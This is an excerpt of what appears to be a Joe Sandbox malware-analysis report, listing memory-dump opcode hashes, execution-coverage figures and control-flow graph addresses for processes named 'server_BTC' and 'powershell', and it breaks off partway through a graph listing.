                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d0cec435a934792f003ca7d7ae06e84a0081b9019a68d8b7ebd1bb5bd8034d4b
                                                                                                                  • Instruction ID: 2472ca795f697e6806ee55e7a9024a56746189309d4b719c6d07927ffb15a76a
                                                                                                                  • Opcode Fuzzy Hash: d0cec435a934792f003ca7d7ae06e84a0081b9019a68d8b7ebd1bb5bd8034d4b
                                                                                                                  • Instruction Fuzzy Hash: DAB2BE789012298FCB65EF64C898B9DB7B2EF49300F6085E9D40DAB764DB345E82CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b2bdf85f532ffcd63e2bd85fd299390c466514d3db413f60bdc940b28bf92d01
                                                                                                                  • Instruction ID: e1d87182d563052f1a15a722824c8a40f8b6c5d9255022ebcd1caf1523b02450
                                                                                                                  • Opcode Fuzzy Hash: b2bdf85f532ffcd63e2bd85fd299390c466514d3db413f60bdc940b28bf92d01
                                                                                                                  • Instruction Fuzzy Hash: D2B2BE789012298FCB65EF64C898B9DB7B2EF49300F6085E9D40DAB764DB345E82CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 50c5b6b3c65a3620fea29cba54d40e6f5b9bb6905feacdc49567ccb4a20195cd
                                                                                                                  • Instruction ID: f7f22ff788599068a2da5e04ba9739d0fb1b80a7a03f1805440b0bca777bb51e
                                                                                                                  • Opcode Fuzzy Hash: 50c5b6b3c65a3620fea29cba54d40e6f5b9bb6905feacdc49567ccb4a20195cd
                                                                                                                  • Instruction Fuzzy Hash: D262BD78901219CFCB65EF64D994B9DBBB2FF48301F1084A9D40AA73A4DB305E9ACF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: eac450627012a07696179d18313fcbc5a252203b78375e3a7dc7c71b8223dd9d
                                                                                                                  • Instruction ID: 599a285309492d079bc97881745f0960513d1f2725254325a2048865b7181a30
                                                                                                                  • Opcode Fuzzy Hash: eac450627012a07696179d18313fcbc5a252203b78375e3a7dc7c71b8223dd9d
                                                                                                                  • Instruction Fuzzy Hash: EA62BE78901219CFCB65EF64D994B9DBBB2FF48700F1084A9D40AA73A4DB305E9ACF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 85e50919679ee4dc9606f45209237529e96ef8d2e57b6bece0f97499c69cfc8f
                                                                                                                  • Instruction ID: fb5c6376be24cfa8577839e4c172c559db07362862b47c1aa5e2cdf871fb08f7
                                                                                                                  • Opcode Fuzzy Hash: 85e50919679ee4dc9606f45209237529e96ef8d2e57b6bece0f97499c69cfc8f
                                                                                                                  • Instruction Fuzzy Hash: E041EFB9D002489FDB15DFA9C484ADEFFB5AF88300F14842AD458AB254C7749846CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f9e6d05ac0931cd349a81d116c28392b5f63adb431d6ce913ed000415fc98f64
                                                                                                                  • Instruction ID: 74799681849558b1c7a37e21d388bde8de08252818339985c0e024afac915232
                                                                                                                  • Opcode Fuzzy Hash: f9e6d05ac0931cd349a81d116c28392b5f63adb431d6ce913ed000415fc98f64
                                                                                                                  • Instruction Fuzzy Hash: 62B1AE78A012298FDB65DF68C994B9DB7B2FB49304F1085E9D40DA7390DB30AE85CF52
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 64119c87e38a97ba4b08254ce772fb032d8dcf522bdf3cae83e101e11293dd53
                                                                                                                  • Instruction ID: ad785ecc7486fc264a5be890fe1659eecaa9699818706871a5fd7c5211c9a0f3
                                                                                                                  • Opcode Fuzzy Hash: 64119c87e38a97ba4b08254ce772fb032d8dcf522bdf3cae83e101e11293dd53
                                                                                                                  • Instruction Fuzzy Hash: 4F81AF78E10218CFDB54EFA8D894A9DBBB2FF49304F2085A9D419AB364DB346D42CF11
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 271ab6af2f66efd9f136712ca654198776ad921d3a0ac302de3e05afe372cecf
                                                                                                                  • Instruction ID: 106465bfe846565d4bd15b7c317f175cb314f88748ad2858082c4c5042367e82
                                                                                                                  • Opcode Fuzzy Hash: 271ab6af2f66efd9f136712ca654198776ad921d3a0ac302de3e05afe372cecf
                                                                                                                  • Instruction Fuzzy Hash: 5281A078E10218CFCB54EFA8D894A9DBBB2FF49300F6085A9D419AB365DB346D42CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e27e67d5c9aedddd5347e5effff46d7ff152eac9101ae9a1bcb88d0ac5551919
                                                                                                                  • Instruction ID: 37d86f9d681a2ab59fa969679993e9c494449f5177f0044ebc325f050dbf511d
                                                                                                                  • Opcode Fuzzy Hash: e27e67d5c9aedddd5347e5effff46d7ff152eac9101ae9a1bcb88d0ac5551919
                                                                                                                  • Instruction Fuzzy Hash: EE51CDB8D01218CFDB05DFE8D5946EDBBF6AF49304F10812AD42AAB394EB345946CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 91bc1eb7a3400d762a915c42a1949835dfa342ad6e095cb08fc26ed2a2f4abeb
                                                                                                                  • Instruction ID: 54473bbb63de7fcea46b5324448cafd13002b70b19cbe11e6865e540f3eaf797
                                                                                                                  • Opcode Fuzzy Hash: 91bc1eb7a3400d762a915c42a1949835dfa342ad6e095cb08fc26ed2a2f4abeb
                                                                                                                  • Instruction Fuzzy Hash: 8441CEB9D002489FDB15DFAAC584ADEFFF5AF88304F14802AE419AB354C7746985CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 25b47e8be7fd4a7282eebfccc7c2f0bc85803d55efc8ab5d1aa3e510c37f2fd6
                                                                                                                  • Instruction ID: 015722a119f539c51730240ab91ec1d64fb26e4fe0d10cdc4258f9006ec454b7
                                                                                                                  • Opcode Fuzzy Hash: 25b47e8be7fd4a7282eebfccc7c2f0bc85803d55efc8ab5d1aa3e510c37f2fd6
                                                                                                                  • Instruction Fuzzy Hash: 4D31C278E012098FCB05DBB4D551AEEBBB2EF89304F2094AAD419B7390DB355D42CF65
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a40e5825a5035cebe7ab359a885bbd28d032093c29c2abd4616d88b967b1405f
                                                                                                                  • Instruction ID: c9f3f2983f41784f8ff16dc8465633b0fb450093d9c3e54073eb790bf224801b
                                                                                                                  • Opcode Fuzzy Hash: a40e5825a5035cebe7ab359a885bbd28d032093c29c2abd4616d88b967b1405f
                                                                                                                  • Instruction Fuzzy Hash: BB21C378E012098FCB09DFA9D550AEEB7B2EF89300F209469D419B7394DB366D42CF65
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d23319877c13cd0154f25d49367d206034fece0ce7e8548ac80f71152222b585
                                                                                                                  • Instruction ID: 66072fc6867eee148d6ea92c66236466647e7cefd2d49b158464305e3c17f4d9
                                                                                                                  • Opcode Fuzzy Hash: d23319877c13cd0154f25d49367d206034fece0ce7e8548ac80f71152222b585
                                                                                                                  • Instruction Fuzzy Hash: 4421C3B9C092898FDB159F74D8593EEBFB1EF02305F0588AAC485A71D2DB780646CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9e4184d56907594d9cf9076310628f25bc2cf24fcc49a3b83b25acb7dfe2cf0c
                                                                                                                  • Instruction ID: 19962ea4126d4a37ba96fea90df58b35ef209837920af45d4379904e1511127f
                                                                                                                  • Opcode Fuzzy Hash: 9e4184d56907594d9cf9076310628f25bc2cf24fcc49a3b83b25acb7dfe2cf0c
                                                                                                                  • Instruction Fuzzy Hash: D711A5797053009FE702AB7CE81465A3BB6EB46314B0140B9D146CB3A5DE24DD168B93
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6fe2be7e1d41be0544e65f8b630b0e2bad24cc32b8c4cf603e578313b712b5f4
                                                                                                                  • Instruction ID: ba8d3d5a839055ffb630b0b42a4046365779df5434e057e3d5bcf0e21a400c15
                                                                                                                  • Opcode Fuzzy Hash: 6fe2be7e1d41be0544e65f8b630b0e2bad24cc32b8c4cf603e578313b712b5f4
                                                                                                                  • Instruction Fuzzy Hash: D2011A78C412199FDB04EFB4D15D7AEBBB0EF05305F0498AA8416A32D1DB784658CFA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 723a5653771dfca21e8e16f6718ec84c23a3940a8af861a6bc36228604c0d17a
                                                                                                                  • Instruction ID: fdad04dbed5003c0de8d1fc097d289e5c3a346d3e8767a94c9537f0dc75e08bb
                                                                                                                  • Opcode Fuzzy Hash: 723a5653771dfca21e8e16f6718ec84c23a3940a8af861a6bc36228604c0d17a
                                                                                                                  • Instruction Fuzzy Hash: A6017274B41319AFCB68DB34D850BAE7372AF86315F5094E9804D67290CE369E86CF1A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d2b74b8190143162b1da7758a7c8d3a7ec2f543dc0fc312b93c7edbceaa8a7ab
                                                                                                                  • Instruction ID: 79b22ef79f542604d97dd9138ea2ea510a0732f8a84fc74688c4ce2a1cca5e71
                                                                                                                  • Opcode Fuzzy Hash: d2b74b8190143162b1da7758a7c8d3a7ec2f543dc0fc312b93c7edbceaa8a7ab
                                                                                                                  • Instruction Fuzzy Hash: 73F082B8D052049FC705EF74E9499987F70FB05215F1182E9D409973E1D7308D57CB41
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d2479f4b0a52c38ec5a8b83a16d282027948a01e316c8bc0ab8acd2733f6a815
                                                                                                                  • Instruction ID: d4e053943dd3e757cab2a431d9305e6f452269e8357d8763480bc5b5f85a4649
                                                                                                                  • Opcode Fuzzy Hash: d2479f4b0a52c38ec5a8b83a16d282027948a01e316c8bc0ab8acd2733f6a815
                                                                                                                  • Instruction Fuzzy Hash: 65F08CB8D00159CFDB25DFA4E4587ECBBB4EF4A302F0464AAD00AE3290CB309995CF24
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dceee0c142b963b22729240b6d3faf7e8354837a2301dd63bfef3da125787521
                                                                                                                  • Instruction ID: c0f26d11f8cbe00ea38942e851b7f556f583db437d64790a42a77ad04ef29242
                                                                                                                  • Opcode Fuzzy Hash: dceee0c142b963b22729240b6d3faf7e8354837a2301dd63bfef3da125787521
                                                                                                                  • Instruction Fuzzy Hash: 5FE022B4942149CFCB01EF74DA046AC7F76DB01204F1085AED40AE7290D6301F24CB52
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 06abf3bee124384eabe208e04dec442d576d75a58268f0ae818ebee71d5c2bf0
                                                                                                                  • Instruction ID: e096efe13828c9900637e98e75d500009517d83bf1f08ed882a1a9cf0142685a
                                                                                                                  • Opcode Fuzzy Hash: 06abf3bee124384eabe208e04dec442d576d75a58268f0ae818ebee71d5c2bf0
                                                                                                                  • Instruction Fuzzy Hash: C2E01AB8D01208DFCB44EF78E548A99BBB0FB49311F1081A9D809933A4E7709D5ACB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 756ca8c32b56bd2ba4483c89f7b5d8395857a780123fb5622aef9ee742a955f0
                                                                                                                  • Instruction ID: a434f545f5be5bef0375c246ee2678bd2f243395f30769425dcf4a755459f5a9
                                                                                                                  • Opcode Fuzzy Hash: 756ca8c32b56bd2ba4483c89f7b5d8395857a780123fb5622aef9ee742a955f0
                                                                                                                  • Instruction Fuzzy Hash: 7DD02EB9C4A3444FC301ABB8680BAA07F38EB03224F0183DAE0A8932D3D6204822C756
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9aa9976894522f7ae2b4ffa4de51d32bb5a6db912d68605a86afefc46d1d3db5
                                                                                                                  • Instruction ID: d8cb6cfb0235f7fd48a4cb32d113976537a95aa65d9226c03a2983c23a116b1e
                                                                                                                  • Opcode Fuzzy Hash: 9aa9976894522f7ae2b4ffa4de51d32bb5a6db912d68605a86afefc46d1d3db5
                                                                                                                  • Instruction Fuzzy Hash: 76E086B4941108DFDB00EFB8E60469DBBB9EB05314F1085A9D40AE3280DB351E24DB96
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e053b15cb1aa001dabc5532c7d6040d2cc05b495797d28842b69e9754ebacecb
                                                                                                                  • Instruction ID: b2212f5117ed697eeb29bdf254210f0b85a66ae09448d4138909444a446e8b31
                                                                                                                  • Opcode Fuzzy Hash: e053b15cb1aa001dabc5532c7d6040d2cc05b495797d28842b69e9754ebacecb
                                                                                                                  • Instruction Fuzzy Hash: 15D095B5C092548FC3164B743E056947F34D703315F0A42DBD06C931E6D7304515C731
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c596f13156c44f9c61e6c78878d30679e9db6c6faad633a6c10eef5efee432a7
                                                                                                                  • Instruction ID: cf7b670b6b74ec6941b091d3214754a9921df896684295108f150a4b8c490713
                                                                                                                  • Opcode Fuzzy Hash: c596f13156c44f9c61e6c78878d30679e9db6c6faad633a6c10eef5efee432a7
                                                                                                                  • Instruction Fuzzy Hash: 4BC08074C4130C9BC710EFB9B409B95BB7CDB43315F40415DD40C53341D7754460CAAA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f19a767e36350e96a6a92dcd77b2b17c5b2cff6f70a82102c6da466ac500bd2f
                                                                                                                  • Instruction ID: 9064bc11bbbb02e5e1a762229d82d3eb17e771d591da0e8be1322494d00cdcb9
                                                                                                                  • Opcode Fuzzy Hash: f19a767e36350e96a6a92dcd77b2b17c5b2cff6f70a82102c6da466ac500bd2f
                                                                                                                  • Instruction Fuzzy Hash: D3C08074C4121C9BC714DF95B508B55B77CD702315F04415DE54C93284EB715450C6B6

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:6.2%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:3
                                                                                                                  Total number of Limit Nodes:0
                                                                                                                  execution_graph 21995 8977560 21996 89775a3 SetThreadToken 21995->21996 21997 89775d1 21996->21997

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 809 306b470-306b4a9 811 306b4ae-306b7e9 call 306acbc 809->811 812 306b4ab 809->812 873 306b7ee-306b7f5 811->873 812->811
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 89d0cbf63e51615d3081db36129b9f0be78f958995b26ff58bebaeef58cfe856
                                                                                                                  • Instruction ID: e9b42bfbe48b0d48985c7651a6c4f39a760fe219f8a8cf2afa2f27c041bc68e2
                                                                                                                  • Opcode Fuzzy Hash: 89d0cbf63e51615d3081db36129b9f0be78f958995b26ff58bebaeef58cfe856
                                                                                                                  • Instruction Fuzzy Hash: 84918070B016195BCB19EFB484116AEBBF2EFC4704B00891EE15AAB341DF356E06CBD6

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 874 306b490-306b4a9 875 306b4ae-306b7e9 call 306acbc 874->875 876 306b4ab 874->876 937 306b7ee-306b7f5 875->937 876->875
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c7a6bf92f8c7a68f9a6b07b105dd92e19e4420b9696c43265c7b48d4c3578287
                                                                                                                  • Instruction ID: 85dbd757931ac84f723576425ccc22e730fd9d8d47f8ffee2ba6c93b1739d5cd
                                                                                                                  • Opcode Fuzzy Hash: c7a6bf92f8c7a68f9a6b07b105dd92e19e4420b9696c43265c7b48d4c3578287
                                                                                                                  • Instruction Fuzzy Hash: AF918070B016199BDB19EFB484116AEB7F2EFC4700B00C91EE55AAB344DF356E068BD6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2287340842.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_7800000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $a.k$$a.k$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$tP]q$tP]q$tP]q$tP]q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-220585383
                                                                                                                  • Opcode ID: 5dcab5d0b81ea6559f037670e26b9da4a3eac024259162889f65a0f62f3cd4d3
                                                                                                                  • Instruction ID: 3c5263474753a9cf61728340634122fde1ad3ec762305956c681dccfd59c0704
                                                                                                                  • Opcode Fuzzy Hash: 5dcab5d0b81ea6559f037670e26b9da4a3eac024259162889f65a0f62f3cd4d3
                                                                                                                  • Instruction Fuzzy Hash: 5D8257B17042469FCB658F689C057AABBE2BF96324F1480BFD545CB281DB75C881C7E2

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 319 7803ce8-7803d0d 320 7803f00-7803f4a 319->320 321 7803d13-7803d18 319->321 331 7803f50-7803f55 320->331 332 78040ce-7804112 320->332 322 7803d30-7803d34 321->322 323 7803d1a-7803d20 321->323 326 7803eb0-7803eba 322->326 327 7803d3a-7803d3c 322->327 324 7803d22 323->324 325 7803d24-7803d2e 323->325 324->322 325->322 333 7803ec8-7803ece 326->333 334 7803ebc-7803ec5 326->334 329 7803d4c 327->329 330 7803d3e-7803d4a 327->330 338 7803d4e-7803d50 329->338 330->338 339 7803f57-7803f5d 331->339 340 7803f6d-7803f71 331->340 348 7804228-780425d 332->348 349 7804118-780411d 332->349 335 7803ed0-7803ed2 333->335 336 7803ed4-7803ee0 333->336 342 7803ee2-7803efd 335->342 336->342 338->326 345 7803d56-7803d75 338->345 346 7803f61-7803f6b 339->346 347 7803f5f 339->347 343 7804080-780408a 340->343 344 7803f77-7803f79 340->344 351 7804097-780409d 343->351 352 780408c-7804094 343->352 353 7803f89 344->353 354 7803f7b-7803f87 344->354 379 7803d85 345->379 380 7803d77-7803d83 345->380 346->340 347->340 373 780428b-7804295 348->373 374 780425f-7804281 348->374 356 7804135-7804139 349->356 357 780411f-7804125 349->357 359 78040a3-78040af 351->359 360 780409f-78040a1 351->360 358 7803f8b-7803f8d 353->358 354->358 365 78041da-78041e4 356->365 366 780413f-7804141 356->366 363 7804127 357->363 364 7804129-7804133 357->364 358->343 368 7803f93-7803fb2 358->368 369 78040b1-78040cb 359->369 360->369 363->356 364->356 375 78041f1-78041f7 365->375 376 78041e6-78041ee 365->376 371 7804151 366->371 372 7804143-780414f 366->372 410 7803fc2 368->410 411 7803fb4-7803fc0 368->411 382 7804153-7804155 371->382 372->382 387 7804297-780429c 373->387 388 780429f-78042a5 373->388 415 7804283-7804288 374->415 416 78042d5-78042e1 374->416 384 78041f9-78041fb 375->384 385 78041fd-7804209 375->385 389 7803d87-7803d89 379->389 380->389 382->365 390 780415b-780415d 382->390 392 780420b-7804225 384->392 385->392 393 78042a7-78042a9 388->393 394 78042ab-78042b7 388->394 389->326 396 7803d8f-7803d96 389->396 397 7804177-780417e 390->397 398 780415f-7804165 390->398 395 78042b9-78042d2 393->395 394->395 396->320 404 7803d9c-7803da1 396->404 408 7804180-7804186 397->408 409 7804196-78041d7 397->409 405 7804167 398->405 406 7804169-7804175 398->406 413 7803da3-7803da9 404->413 414 7803db9-7803dc8 404->414 405->397 406->397 417 7804188 408->417 418 780418a-7804194 408->418 419 7803fc4-7803fc6 410->419 411->419 423 7803dab 413->423 424 7803dad-7803db7 413->424 414->326 433 7803dce-7803dec 414->433 425 78042eb-78042fe 416->425 417->409 418->409 419->343 426 7803fcc-7804003 419->426 423->414 424->414 434 7804300-7804326 425->434 435 780432d-780434c 425->435 443 7804005-780400b 